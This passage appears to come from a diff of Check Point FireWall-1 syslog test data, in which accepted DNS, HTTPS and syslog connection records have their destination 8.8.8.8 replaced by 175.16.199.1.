FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42674"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34504"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41608"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] -<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60803"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41608"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60803"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38746"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52714"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e29f,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42919"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59749"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42919"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59749"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55348"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504928"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59795"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] -<134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504929"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57847"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504929"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46923"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504928"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59795"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504929"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57847"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504929"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46923"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58910"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:02:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e2a1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T18:02:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
